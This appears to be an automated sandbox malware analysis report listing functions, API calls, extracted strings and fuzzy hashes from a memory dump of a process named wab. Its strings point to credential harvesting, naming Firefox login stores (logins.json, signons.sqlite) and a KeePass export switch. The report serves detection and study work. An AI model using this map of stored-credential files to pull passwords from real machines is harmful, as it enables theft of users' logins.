                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                                          • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                                          • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003EE,00451398), ref: 00401273
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2998058495-0
                                                                                                                                                                                                          • Opcode ID: 0f9c4242ba45eb06dd3dfa1dd6db45fade88f32ef90b46f4d12f3d9a9e08a6d1
                                                                                                                                                                                                          • Instruction ID: cf74e5707885198988a29297af0a26d915b41f86d4ff93bb74c60bb1bb3fb963
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f9c4242ba45eb06dd3dfa1dd6db45fade88f32ef90b46f4d12f3d9a9e08a6d1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04618B35800208EBDF12AFA0DD85BAE7FA5BB04305F1481B6F904BA2F2C7B59950DF58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040B94B Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 300windowregistrystringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00408DE1: LoadMenuA.USER32(00000000), ref: 00408DE9
                                                                                                                                                                                                            • Part of subcall function 00408DE1: sprintf.MSVCRT ref: 00408E0C
                                                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 0040BA7E
                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BAB1
                                                                                                                                                                                                          • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BAC7
                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BB27
                                                                                                                                                                                                          • LoadIconA.USER32(00000066,00000000), ref: 0040BB96
                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040BBEE
                                                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(80000001,0044551F), ref: 0040BC03
                                                                                                                                                                                                          • SetFocus.USER32(?), ref: 0040BC29
                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(004518C0), ref: 0040BC42
                                                                                                                                                                                                          • GetTempPathA.KERNEL32(00000104,004518C0), ref: 0040BC52
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040BC59
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040BC67
                                                                                                                                                                                                          • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BCC3
                                                                                                                                                                                                            • Part of subcall function 00404B82: strlen.MSVCRT ref: 00404B9F
                                                                                                                                                                                                            • Part of subcall function 00404B82: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404BC3
                                                                                                                                                                                                          • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BD0E
                                                                                                                                                                                                          • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BD21
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BD36
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 0040BD5A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                                                                          • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                                                          • API String ID: 2303586283-933021314
                                                                                                                                                                                                          • Opcode ID: bc2ea265da4b9d7fbf42eb82516b20c9e5d99f5c25abf20ff2f7a7fba55c6b61
                                                                                                                                                                                                          • Instruction ID: a3034197930a53117d85b49231bdaaa03d04473d70278c5121b5a691f959c143
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc2ea265da4b9d7fbf42eb82516b20c9e5d99f5c25abf20ff2f7a7fba55c6b61
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13C1E0B1644788FFEB16DF64CC45BDABBA5FF14304F00016AFA44AB292C7B59904CB99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004109F8 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                          • API String ID: 633282248-1996832678
                                                                                                                                                                                                          • Opcode ID: d48ae4295fbb277336b7674ab4026529653ef1736987acc8de4e4bffa9c8da66
                                                                                                                                                                                                          • Instruction ID: 7c6bf41bc1280a1bc88d4c6d4cc59bc6a86d5934fc3475aca932ea250c86fdc0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d48ae4295fbb277336b7674ab4026529653ef1736987acc8de4e4bffa9c8da66
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E31E7B2805324BEFB14EA54DD42EDEB76CAF11354F20415FF214A2182DBBC9ED48A9D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040A6AF Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                          • API String ID: 710961058-601624466
                                                                                                                                                                                                          • Opcode ID: 6b5a2a585f50ca3eac413cecb2812d02d42192bb924b4e36303969acff340374
                                                                                                                                                                                                          • Instruction ID: 74eb9a4e80b6148bc8e6745fd37c56fddd23ac0c0a2d0b32ddfd32f18a43723b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b5a2a585f50ca3eac413cecb2812d02d42192bb924b4e36303969acff340374
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC61B232900214AFEF14EF64CC81EDE7B79EF05314F10419AF905AB1D2DB749A55CB55
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00410B15 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                          • API String ID: 3402215030-3842416460
                                                                                                                                                                                                          • Opcode ID: 17ed6d14846e4c5c10a4de3d65ab3a3dc687bb0adce687871bc2f7fa502a4f2e
                                                                                                                                                                                                          • Instruction ID: 369df5ceca9bdb9f61db2c44a96b4e719fee50907ea6fa1c749cf0cc9e3d70a7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17ed6d14846e4c5c10a4de3d65ab3a3dc687bb0adce687871bc2f7fa502a4f2e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC4176B684011DAEEB11EE54DC41FEB776CAF55305F0401EBB608E2142E7789F988FA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00441A6C Relevance: 27.4, APIs: 7, Strings: 11, Instructions: 375COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                                                                                                          • String ID: %s mode not allowed: %s$BINARY$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                                          • API String ID: 231171946-1411472696
                                                                                                                                                                                                          • Opcode ID: ee0957bba9a21b500f81e6c25a2f981e0bf1c959c719be955f11db3b2c6e13f4
                                                                                                                                                                                                          • Instruction ID: 52e3131474fa5b42b7a716d11f9a5693575ad96a685679239bae0d8a086cc604
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee0957bba9a21b500f81e6c25a2f981e0bf1c959c719be955f11db3b2c6e13f4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6ED13571D40209AAFF24CF99C8807EFBBB1AF15349F24405FE84197361E3789AC68B59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040C12B Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 110stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                                          • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos$lD
                                                                                                                                                                                                          • API String ID: 1012775001-1916105108
                                                                                                                                                                                                          • Opcode ID: 122b63003726a974bfadc130288c83bc1cbd12b8fd6105304b92718d22d06189
                                                                                                                                                                                                          • Instruction ID: 0f0ca2c9629047d536013ad0a00a476c63862c7e4230734d296e8a5f64e20069
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 122b63003726a974bfadc130288c83bc1cbd12b8fd6105304b92718d22d06189
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41415A72940118ABDB20DB54CC88FDAB7BCAB59300F4541EAF50DE7192DA74AA858FA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040EA92 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 166stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004078B8: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040EAAB,?,?,?,?), ref: 004078D1
                                                                                                                                                                                                            • Part of subcall function 004078B8: CloseHandle.KERNEL32(00000000,?,?,?), ref: 004078FD
                                                                                                                                                                                                            • Part of subcall function 004045BD: ??3@YAXPAX@Z.MSVCRT ref: 004045C4
                                                                                                                                                                                                            • Part of subcall function 00406DD3: _mbscpy.MSVCRT ref: 00406DD8
                                                                                                                                                                                                            • Part of subcall function 00406DD3: strrchr.MSVCRT ref: 00406DE0
                                                                                                                                                                                                            • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D80B
                                                                                                                                                                                                            • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D81F
                                                                                                                                                                                                            • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D833
                                                                                                                                                                                                            • Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D900
                                                                                                                                                                                                            • Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D960
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040EAF0
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040EAFE
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040EB3F
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040EB4E
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040EB5C
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040EB9D
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040EBAC
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040EBBA
                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040EC68
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040EC83
                                                                                                                                                                                                            • Part of subcall function 00406E81: _mbscpy.MSVCRT ref: 00406E89
                                                                                                                                                                                                            • Part of subcall function 00406E81: _mbscat.MSVCRT ref: 00406E98
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_strcmpistrrchr
                                                                                                                                                                                                          • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                                                          • API String ID: 3884059725-3138536805
                                                                                                                                                                                                          • Opcode ID: c5b9952702cbd755305f6f4c2c58a42ef73f51976a5d7d3736a15114e020422c
                                                                                                                                                                                                          • Instruction ID: df88ffc6541641ac30fc10f5b0fca58fec5c07c4b1c9a15943a758993f488c50
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5b9952702cbd755305f6f4c2c58a42ef73f51976a5d7d3736a15114e020422c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D512971508209AEE714EB62DC85BDAB7ECAF11305F10057BE145E20C2EF79B6648B99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040CAFA Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _strcmpi
                                                                                                                                                                                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                          • API String ID: 1439213657-1959339147
                                                                                                                                                                                                          • Opcode ID: 77925ccb47b99d7184ab421125f296c84d7d33a23461460fa00f3fd3e52541e8
                                                                                                                                                                                                          • Instruction ID: 4795e8c1a20e30d0c9bbc9b6431cc8fe1bf434ed6b151c21ba544f3180274443
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77925ccb47b99d7184ab421125f296c84d7d33a23461460fa00f3fd3e52541e8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89012C6328A71168F93822A63C07F931A88CBD2B3BF32021FFA04E40C4EE5D9014946E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00443AD1 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00443AF6
                                                                                                                                                                                                            • Part of subcall function 00443946: strlen.MSVCRT ref: 00443953
                                                                                                                                                                                                          • strlen.MSVCRT ref: 00443B12
                                                                                                                                                                                                          • memset.MSVCRT ref: 00443B4C
                                                                                                                                                                                                          • memset.MSVCRT ref: 00443B60
                                                                                                                                                                                                          • memset.MSVCRT ref: 00443B74
                                                                                                                                                                                                          • memset.MSVCRT ref: 00443B9A
                                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CFB8
                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFE4
                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFFA
                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memcpy.MSVCRT ref: 0040D031
                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D03B
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443BD1
                                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF6A
                                                                                                                                                                                                            • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF94
                                                                                                                                                                                                            • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D00C
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443C0D
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443C1F
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00443CF6
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443D27
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00443D39
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                                                          • String ID: salu
                                                                                                                                                                                                          • API String ID: 3691931180-4177317985
                                                                                                                                                                                                          • Opcode ID: cfd6af14ea326c76b81993dcf2b8da589751f80de7e5c424798678831997877e
                                                                                                                                                                                                          • Instruction ID: ac1bd25895dca9443f5d295c1451dfd6054ecd25aeec11951aea85171a240119
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfd6af14ea326c76b81993dcf2b8da589751f80de7e5c424798678831997877e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1715F7290011DAADB10EFA5CC81ADEB7BDBF08348F1405BAF648E7191DB749B488F95
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040F9AC Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(psapi.dll,?,0040F791), ref: 0040F9BF
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040F9D8
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040F9E9
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040F9FA
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040FA0B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040FA1C
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0040FA3C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                                                          • API String ID: 2449869053-232097475
                                                                                                                                                                                                          • Opcode ID: 41a7431a570a879339345957c21e7bbc60c6881d878c9e33f6f290671b5569e0
                                                                                                                                                                                                          • Instruction ID: b0622ab91b6b15bab8cd8e6e0f6310f6235a52dd738245c008a901a401bb443a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41a7431a570a879339345957c21e7bbc60c6881d878c9e33f6f290671b5569e0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6017574A41315ABDB31DB256D41F6B2DE49786B41B100037F808F16A5E7B8D806CF6D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00403E83 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 98COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403EBB
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403ECF
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403EE3
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00403F04
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00403F20
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00403F57
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00403F88
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F82
                                                                                                                                                                                                          • <table dir="rtl"><tr><td>, xrefs: 00403F1A
                                                                                                                                                                                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F32
                                                                                                                                                                                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403EFE
                                                                                                                                                                                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403E93
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                                                                                                                                                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                          • API String ID: 113626815-1670831295
                                                                                                                                                                                                          • Opcode ID: e988a86f96cb0b35651706e8a54da2f8db7d6407d8c8c481c34fbc63b9ba1f92
                                                                                                                                                                                                          • Instruction ID: 806bb3af6c01162091129d7dbd14bcfdd9389eda619bfd821539a1a2e53cd61a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e988a86f96cb0b35651706e8a54da2f8db7d6407d8c8c481c34fbc63b9ba1f92
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 553187B2944218BAEB10EB95CC41FDF77ACEB44305F1040ABF609A3141DE789F988B69
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004092CB Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 004092EC
                                                                                                                                                                                                          • LoadMenuA.USER32(?,?), ref: 004092FA
                                                                                                                                                                                                            • Part of subcall function 00409123: GetMenuItemCount.USER32(?), ref: 00409138
                                                                                                                                                                                                            • Part of subcall function 00409123: memset.MSVCRT ref: 00409159
                                                                                                                                                                                                            • Part of subcall function 00409123: GetMenuItemInfoA.USER32 ref: 00409194
                                                                                                                                                                                                            • Part of subcall function 00409123: strchr.MSVCRT ref: 004091AB
                                                                                                                                                                                                          • DestroyMenu.USER32(00000000), ref: 00409318
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040935C
                                                                                                                                                                                                          • CreateDialogParamA.USER32(?,00000000,00000000,004092C6,00000000), ref: 00409371
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040938D
                                                                                                                                                                                                          • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040939E
                                                                                                                                                                                                          • EnumChildWindows.USER32(00000000,Function_00009213,00000000), ref: 004093C6
                                                                                                                                                                                                          • DestroyWindow.USER32(00000000), ref: 004093CD
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                                                          • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                                                          • API String ID: 3259144588-3822380221
